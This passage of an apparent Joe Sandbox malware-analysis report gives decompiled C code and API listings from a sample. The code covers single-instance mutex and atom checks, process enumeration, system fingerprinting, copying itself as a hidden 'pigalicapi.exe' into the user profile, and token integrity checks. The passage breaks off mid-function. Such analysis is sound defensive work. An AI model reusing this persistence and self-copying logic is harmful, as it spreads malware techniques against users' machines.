API ID: Virtual$AllocFree
String ID: Hogerfazwafx$TEMP$TEMP
API String ID: 2087232378-1474595832
Opcode ID: 163a6c67a9ad4a050b6a0ddf75bfa28f589bd25aa1d8280bf8524ef74e6305bb
Instruction ID: 78f313c43f0008814aaec3ee7e7f4a65c37c9c75159239be5687e4ed3a221f5b
Opcode Fuzzy Hash: 163a6c67a9ad4a050b6a0ddf75bfa28f589bd25aa1d8280bf8524ef74e6305bb
Instruction Fuzzy Hash: 70522BB5A042199FEB54DF94DC88FAEB7B6FB48304F148598E509BB280D775AE80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00414330 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 125
synchronizationstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.NTDLL ref: 0041433F
memcpy.NTDLL ref: 0041438D
CreateMutexA.KERNEL32 ref: 004143F5
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
FindAtomA.KERNEL32 ref: 00414421
malloc.MSVCRT ref: 00414439
AddAtomA.KERNEL32 ref: 00414463
free.MSVCRT ref: 0041448D
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
CloseHandle.KERNEL32 ref: 004144A1

Part of subcall function 004142C0: GetAtomNameA.KERNEL32(?,?,00000000), ref: 004142E3

memset.NTDLL ref: 004144E0

Strings

aaaa, xrefs: 004143B9
aaaa, xrefs: 004143C7
aaaa, xrefs: 004143A4
aaaa, xrefs: 004143AB
aaaa, xrefs: 004143C0
aaaa, xrefs: 004143CE
aaaa, xrefs: 004143B2

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Atom$Mutex$CloseCreateFindHandleNameObjectReleaseSingleWaitfreemallocmemcpymemsetstrlen
String ID: aaaa$aaaa$aaaa$aaaa$aaaa$aaaa$aaaa
API String ID: 144078300-3683700703
Opcode ID: 38b3cc8253dde639ec07bf90a86a76e51e9cf28e81e2267e67a4dab4306abd3d
Instruction ID: 6bf16c6f7dc82afa38dfb2dcebf575d49d4c190a343fd4b51b9df02f2ee255c1
Opcode Fuzzy Hash: 38b3cc8253dde639ec07bf90a86a76e51e9cf28e81e2267e67a4dab4306abd3d
Instruction Fuzzy Hash: 635129B89083458BC710EF69D4863AEBBF0BF84301F01896EE8959B385D778D585CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC50 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 123
synchronizationstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.NTDLL ref: 0040EC5F
memcpy.NTDLL ref: 0040ECAD
CreateMutexA.KERNEL32 ref: 0040ED0E
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040E26C), ref: 0040ED2A
FindAtomA.KERNEL32 ref: 0040ED3B
malloc.MSVCRT ref: 0040ED53
AddAtomA.KERNEL32 ref: 0040ED78
free.MSVCRT ref: 0040EDA2
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040EDAD
FindCloseChangeNotification.KERNEL32 ref: 0040EDB9

Strings

aaaa, xrefs: 0040ECE3
aaaa, xrefs: 0040ECEA
aaaa, xrefs: 0040ECC7
aaaa, xrefs: 0040ECCE
aaaa, xrefs: 0040ECD5
aaaa, xrefs: 0040ECC0
aaaa, xrefs: 0040ECDC

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: AtomFindMutex$ChangeCloseCreateNotificationObjectReleaseSingleWaitfreemallocmemcpystrlen
String ID: aaaa$aaaa$aaaa$aaaa$aaaa$aaaa$aaaa
API String ID: 3507070773-3683700703
Opcode ID: d61ac55fb7e6056a8369cbc7b453f13adbe996a2e49b94902fd9d61e9f0cc443
Instruction ID: 8522d72e3f7aa3cec7441999860715555553f08e688ef583daf8eacf07a88261
Opcode Fuzzy Hash: d61ac55fb7e6056a8369cbc7b453f13adbe996a2e49b94902fd9d61e9f0cc443
Instruction Fuzzy Hash: 91517BB85083428FC710AF2AC48A26EBBF0FF84301F01896EE8859B391D778D555CB96

Uniqueness

Uniqueness Score: -1.00%

Function 04004020 Relevance: 30.2, APIs: 20, Instructions: 215
threadsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E04004020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
				signed int _v5;
				signed int _v12;
				char _v16;
				void* _v20;
				struct _CRITICAL_SECTION _v44;
				long _v48;
				void* _v52;
				void _v56;
				long _v60;
				HANDLE* _v64;
				void* _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed int _v84;
				void _v92;
				long _v96;
				signed int _v100;
				HANDLE* _v104;
				HANDLE* _v108;
				void* _t114;
				void* _t141;
				void* _t188;
				void* _t189;
				void* _t191;

				_v5 = 0;
				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
					E04007D20( &_v56,  &_v56, 0, 0x29);
					_t189 = _t188 + 0xc;
					InitializeCriticalSection( &_v44);
					_v16 = _a24;
					_v20 = CreateEventA(0, 1, 0, 0);
					asm("cdq");
					_v12 = _a8 / _a20;
					_v60 = 0;
					while(_v60 < _a16) {
						EnterCriticalSection( &_v44);
						if(_v52 != 0) {
							VirtualFree(_v52, 0, 0x8000);
							_v52 = 0;
							_v48 = 0;
						}
						_t198 = _v56;
						if(_v56 != 0) {
							TerminateThread(_v56, 0);
							_v56 = 0;
						}
						ResetEvent(_v20);
						LeaveCriticalSection( &_v44);
						_t114 = CreateThread(0, 0, E04004AC0,  &_v56, 0, 0); // executed
						_v56 = _t114;
						_v104 = E040097A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
						_v64 = _v104;
						E04007D20(_v104, _v64, 0, _a20 << 2);
						_t191 = _t189 + 0x10;
						_v100 = 0;
						while(_v100 < _a20) {
							_v64[_v100] = 0;
							E04007D20(_v64,  &_v92, 0, 0x1c);
							_t191 = _t191 + 0xc;
							_v68 =  &_v56;
							_v72 = _a12;
							_v92 = _a4;
							_v84 = _v100 * _v12;
							if(_v100 >= _a20 - 1) {
								_v80 = _a8 - 1;
							} else {
								_v80 = _v84 + _v12 - 1;
							}
							_v76 = CreateEventA(0, 1, 0, 0);
							_t141 = CreateThread(0, 0,  &M04004BA0,  &_v92, 0, 0); // executed
							_v64[_v100] = _t141;
							WaitForSingleObject(_v76, 0xffffffff);
							FindCloseChangeNotification(_v76); // executed
							_v100 = _v100 + 1;
						}
						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
						_v96 = WaitForSingleObject(_v20, 0x2710);
						if(_v96 == 0) {
							_v5 = 1;
						}
						_v96 = WaitForSingleObject(_v56, 0x3e8);
						if(_v96 != 0) {
							TerminateThread(_v56, 0);
						}
						EnterCriticalSection( &_v44);
						if(_v52 != 0) {
							VirtualFree(_v52, 0, 0x8000); // executed
							_v52 = 0;
							_v48 = 0;
						}
						LeaveCriticalSection( &_v44);
						_v108 = _v64;
						E040097C0(_v108);
						_t189 = _t191 + 4;
						if((_v5 & 0x000000ff) == 0) {
							_v60 = _v60 + 1;
							continue;
						} else {
						}
						break;
					}
					DeleteCriticalSection( &_v44);
				}
				return _v5;
			}

0x04004026
0x0400402e
0x0400405a
0x0400405f
0x04004066
0x0400406f
0x04004080
0x04004086
0x0400408a
0x0400408d
0x0400409f
0x040040af
0x040040b9
0x040040c6
0x040040cc
0x040040d3
0x040040d3
0x040040da
0x040040de
0x040040e6
0x040040ec
0x040040ec
0x040040f7
0x04004101
0x04004118
0x0400411e
0x0400413d
0x04004143
0x04004153
0x04004158
0x0400415b
0x0400416d
0x0400417f
0x0400418e
0x04004193
0x04004199
0x0400419f
0x040041a5
0x040041af
0x040041bb
0x040041d2
0x040041bd
0x040041c7
0x040041c7
0x040041e3
0x040041f7
0x04004203
0x0400420c
0x04004216
0x0400416a
0x0400416a
0x0400422d
0x04004242
0x04004249
0x0400424b
0x0400424b
0x0400425e
0x04004265
0x0400426d
0x0400426d
0x04004277
0x04004281
0x0400428e
0x04004294
0x0400429b
0x0400429b
0x040042a6
0x040042af
0x040042b6
0x040042bb
0x040042c4
0x0400409c
0x00000000
0x00000000
0x040042c6
0x00000000
0x040042c4
0x040042d1
0x040042d1
0x040042dd

APIs

InitializeCriticalSection.KERNEL32(?), ref: 04004066
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
ResetEvent.KERNEL32(00000000), ref: 040040F7
LeaveCriticalSection.KERNEL32(?), ref: 04004101
CreateThread.KERNEL32 ref: 04004118
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
CreateThread.KERNEL32 ref: 040041F7
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
FindCloseChangeNotification.KERNEL32(?), ref: 04004216
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0400422D
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0400423C
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 04004258
TerminateThread.KERNEL32(00000000,00000000), ref: 0400426D
EnterCriticalSection.KERNEL32(?), ref: 04004277
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400428E
LeaveCriticalSection.KERNEL32(?), ref: 040042A6
DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$CreateThreadWait$EventObjectSingle$EnterFreeLeaveTerminateVirtual$ChangeCloseDeleteFindInitializeMultipleNotificationObjectsReset
String ID:
API String ID: 1593741596-0
Opcode ID: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
Instruction ID: 8bdf0d2272c993105e18f632bfcb20d3462f1ee8570acd5c3bdc395bff94e74a
Opcode Fuzzy Hash: 05fe0913d4c170341a487d691e6358ffadb3a1425a440243058cc0667604890e
Instruction Fuzzy Hash: 6A910D74A04208AFEB14DFA4D849BDDBBB5FB48705F108219FA05BB2C0D778A984CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04005700 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 148
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E04005700(CHAR* _a4) {
				char _v5;
				char _v24;
				long _v28;
				void* _v32;
				char _v556;
				long _v560;
				void* _v564;
				long _v568;
				intOrPtr _t59;
				void* _t67;
				void* _t71;

				_v5 = 0;
				if(_a4 != 0) {
					E04008F80(_a4, 0x100, _a4 + 0x437); // executed
					GetModuleFileNameA(0, _a4 + 0x100, 0x104);
					E04001CA0(_a4 + 0x204, 0x104); // executed
					E04009D20( &_v24, _a4 + 0x40c, 0x27); // executed
					E04007B70(_a4 + 0x45b,  &_v24, 0x10);
					_t59 = E04005CD0(_a4 + 0x100); // executed
					 *((intOrPtr*)(_a4 + 0x433)) = _t59;
					lstrcpyA(_a4 + 0x43b, "pigalicapi");
					E04007D20( &_v556,  &_v556, 0, 0x208);
					_v28 = 0x207;
					if(( *0x401435a & 0x000000ff) == 0) {
						GetEnvironmentVariableA("USERPROFILE",  &_v556, 0x207);
					} else {
						__imp__GetAllUsersProfileDirectoryA( &_v556,  &_v28);
					}
					wnsprintfA(_a4 + 0x308, 0x104, "%s\\%s.exe",  &_v556, "pigalicapi");
					_t67 = CreateFileA(_a4 + 0x100, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_v32 = _t67;
					if(_v32 != 0xffffffff) {
						_v560 = GetFileSize(_v32, 0);
						if(_v560 > 0) {
							_t71 = VirtualAlloc(0, _v560, 0x3000, 4); // executed
							_v564 = _t71;
							if(_v564 != 0) {
								_v568 = 0;
								ReadFile(_v32, _v564, _v560,  &_v568, 0); // executed
								if(_v568 != _v560) {
									VirtualFree(_v564, 0, 0x8000);
								} else {
									 *(_a4 + 0x453) = _v560;
									 *(_a4 + 0x457) = _v564;
								}
							}
						}
						CloseHandle(_v32);
					}
					_v5 = 1;
				}
				return _v5;
			}

0x04005709
0x04005711
0x04005729
0x04005742
0x04005756
0x0400576e
0x04005786
0x04005798
0x040057a3
0x040057b8
0x040057cc
0x040057d4
0x040057e4
0x0400580a
0x040057e6
0x040057f1
0x040057f1
0x0400582f
0x04005854
0x0400585a
0x04005861
0x04005873
0x04005880
0x04005896
0x0400589c
0x040058a9
0x040058ab
0x040058d0
0x040058e2
0x04005912
0x040058e4
0x040058ed
0x040058fc
0x040058fc
0x040058e2
0x040058a9
0x0400591c
0x0400591c
0x04005922
0x04005922
0x0400592c

APIs

Part of subcall function 04008F80: GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
Part of subcall function 04008F80: GetSystemInfo.KERNEL32(?), ref: 04009009
Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
Part of subcall function 04008F80: lstrlenA.KERNEL32(?), ref: 0400922F
Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,?), ref: 04009253
Part of subcall function 04008F80: lstrlenA.KERNEL32(00000000), ref: 0400925D
Part of subcall function 04008F80: lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275

GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742

Part of subcall function 04001CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
Part of subcall function 04001CA0: GetCurrentProcessId.KERNEL32 ref: 04001CEE
Part of subcall function 04001CA0: Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
Part of subcall function 04001CA0: lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
Part of subcall function 04001CA0: lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
Part of subcall function 04001CA0: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
Part of subcall function 04001CA0: EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
Part of subcall function 04001CA0: GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
Part of subcall function 04001CA0: FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
Part of subcall function 04001CA0: CloseHandle.KERNEL32(000000FF), ref: 04001E4B

Part of subcall function 04009D20: GetSystemDirectoryA.KERNEL32 ref: 04009D9A
Part of subcall function 04009D20: GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
Part of subcall function 04009D20: StringFromCLSID.OLE32(00000020,?), ref: 04009EF7

Part of subcall function 04005CD0: lstrlenA.KERNEL32(00000000), ref: 04005CEB
Part of subcall function 04005CD0: CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
Part of subcall function 04005CD0: GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
Part of subcall function 04005CD0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
Part of subcall function 04005CD0: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
Part of subcall function 04005CD0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
Part of subcall function 04005CD0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3

lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000207), ref: 0400580A
wnsprintfA.SHLWAPI ref: 0400582F
CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005896
ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 040058D0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04005912
CloseHandle.KERNEL32(000000FF), ref: 0400591C

Strings

pigalicapi, xrefs: 040057A9, 04005810
USERPROFILE, xrefs: 04005805
%s\%s.exe, xrefs: 0400581C

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: File$lstrcat$CloseVirtuallstrlen$CreateProcess$AllocChangeDirectoryFindFirstFreeHandleModuleNameNotificationProcess32ReadSizeSystemlstrcpy$CurrentEnumEnvironmentFromInfoInformationModulesOpenProfileSnapshotStringToolhelp32UsersVariableVersionVolumewnsprintf
String ID: %s\%s.exe$USERPROFILE$pigalicapi
API String ID: 560841407-4090404022
Opcode ID: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
Instruction ID: 5a1df65dd39d11d2feffdc598e8508d5089156913625d6b4e9fa29ff03a3d0d3
Opcode Fuzzy Hash: d5d8b7378ef743f007312c818edffbb4ef282e82611c05111bfa373c5cb79892
Instruction Fuzzy Hash: 66515FB4944208BBFB14DF60DC59FEA7774EB44709F048168FA097A2C1D778AA81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04001120 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 116
stringfilethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E04001120(CHAR* _a4, CHAR* _a8, signed int _a12, signed char _a16, void** _a20) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				void* _v16;
				char _v284;
				void* _v288;
				char _v556;
				void* _v560;
				void* _v564;
				void* _t58;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && lstrlenA(_a4) != 0 && lstrlenA(_a8) != 0) {
					_v12 = 0x104;
					if((_a12 & 0x000000ff) == 0) {
						GetEnvironmentVariableA("USERPROFILE",  &_v284, 0x104);
					} else {
						__imp__GetAllUsersProfileDirectoryA( &_v284,  &_v12);
					}
					wnsprintfA( &_v556, 0x103, "%s\\%s.exe",  &_v284, _a8);
					if(lstrcmpiA(_a4,  &_v556) != 0 && (_a16 & 0x000000ff) == 0) {
						CopyFileA(_a4,  &_v556, 0); // executed
						SetFileAttributesA( &_v556, 6); // executed
						lstrcpyA(_a4,  &_v556);
					}
					_v560 = E040097A0(0x30d);
					_v16 = _v560;
					 *((char*)(_v16 + 0x30c)) = _a12;
					lstrcpyA(_v16,  &_v556);
					lstrcpyA(_v16 + 0x208, _a8);
					_t58 = CreateThread(0, 0, E040012D0, _v16, 0, 0); // executed
					_v288 = _t58;
					if(_v288 == 0) {
						_v564 = _v16;
						E040097C0(_v564);
					} else {
						if(_a20 != 0) {
							 *_a20 = _v288;
						}
						_v8 = 1;
					}
				}
				return _v8;
			}

0x04001129
0x04001134
0x04001168
0x04001175
0x0400119b
0x04001177
0x04001182
0x04001182
0x040011bd
0x040011d9
0x040011f0
0x040011ff
0x04001210
0x04001210
0x04001223
0x0400122f
0x04001238
0x04001249
0x0400125d
0x04001274
0x0400127a
0x04001287
0x040012a6
0x040012b3
0x04001289
0x0400128d
0x04001298
0x04001298
0x0400129a
0x0400129a
0x04001287
0x040012c1

APIs

lstrlenA.KERNEL32(00000000), ref: 04001148
lstrlenA.KERNEL32(00000000), ref: 0400115A
GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182

Part of subcall function 040097C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 040097CF
Part of subcall function 040097C0: HeapFree.KERNEL32(00000000), ref: 040097D6

GetEnvironmentVariableA.KERNEL32(USERPROFILE,?,00000104), ref: 0400119B
wnsprintfA.SHLWAPI ref: 040011BD
lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
lstrcpyA.KERNEL32(00000104,?), ref: 04001210
lstrcpyA.KERNEL32(00000000,?), ref: 04001249
lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
CreateThread.KERNEL32 ref: 04001274

Strings

%s\%s.exe, xrefs: 040011AC
USERPROFILE, xrefs: 04001196

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: lstrcpy$FileHeaplstrlen$AttributesCopyCreateDirectoryEnvironmentFreeProcessProfileThreadUsersVariablelstrcmpiwnsprintf
String ID: %s\%s.exe$USERPROFILE
API String ID: 1231128424-1744756051
Opcode ID: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
Instruction ID: 5a94151192094d4d6073c3e413aca9132142fa07401a96dcdce05a8263d9ef35
Opcode Fuzzy Hash: b85ef1de13e11c0e00b9ed9ca29e0f6effca0754590a52f5089cd6d741d3fe99
Instruction Fuzzy Hash: 2A413675904208ABEB54CFA4D889BDE77B4EF48704F00C295F509AA281D779EA84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 040099F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E040099F0() {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				char _v1044;
				char _v2068;
				long _v2072;
				void* _v2076;
				void* _v2080;
				char _v2084;
				int _t43;

				_v9 = 0;
				_v8 = 0x400;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
					L12:
					return _v9;
				}
				_v2072 = 0;
				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
				if(_v2072 >= 0x400) {
					L11:
					CloseHandle(_v16);
					goto L12;
				}
				_v2076 =  &_v1044;
				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
				if(_t43 == 0) {
					goto L11;
				}
				_v2080 =  &_v2068;
				_v2084 = 0x44;
				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
				if(EqualSid(_v2080,  *_v2076) == 0) {
					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
					if(EqualSid(_v2080,  *_v2076) == 0) {
						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
						if(EqualSid(_v2080,  *_v2076) == 0) {
							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
							if(EqualSid(_v2080,  *_v2076) == 0) {
								goto L11;
							}
							return 1;
						}
						return 1;
					}
					return 1;
				}
				return 1;
			}

0x040099f9
0x040099fd
0x04009a19
0x04009b80
0x00000000
0x04009b80
0x04009a1f
0x04009a3a
0x04009a4a
0x04009b76
0x04009b7a
0x00000000
0x04009b7a
0x04009a56
0x04009a77
0x04009a7f
0x00000000
0x00000000
0x04009a8b
0x04009a91
0x04009aad
0x04009acb
0x04009ae6
0x04009b04
0x04009b1c
0x04009b3a
0x04009b52
0x04009b70
0x00000000
0x00000000
0x00000000
0x04009b72
0x00000000
0x04009b3c
0x00000000
0x04009b06
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 04009AE6
EqualSid.ADVAPI32(?), ref: 04009AFC
CloseHandle.KERNEL32(?), ref: 04009B7A

Strings

D, xrefs: 04009A91

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
String ID: D
API String ID: 98007406-2746444292
Opcode ID: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
Instruction ID: 7ae4063a6f13a9051a7762c6ae15c07f15253da6e1139fe1377935b2c4657608
Opcode Fuzzy Hash: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
Instruction Fuzzy Hash: AB41F0B5A042189BEB24DF90CC45FDAB3FDFF48700F04C1E4A549A6181DE74AA81DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04005A00 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 99
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04005A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				void* _t27;
				void* _t33;
				CHAR* _t35;
				int _t39;
				long _t43;
				CHAR* _t51;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
					E04007D20(_t27, "Mzsrkvcweomac", 0, 0xe);
					lstrcpyA("Mzsrkvcweomac", "WDefault");
					_t33 = E04005930(_a4 + 0x45b, "Mzsrkvcweomac", 0xd); // executed
					E04007D20(_t33, _a8, 0, _a12);
					_t35 =  *0x401189c; // 0x400c4e0
					if(lstrlenA(_t35) < _a12) {
						_t51 =  *0x401189c; // 0x400c4e0
						lstrcpyA(_a8, _t51);
						_t39 = lstrlenA(_a8);
						if(_t39 + lstrlenA(?str?) < _a12) {
							lstrcatA(_a8, "Mzsrkvcweomac");
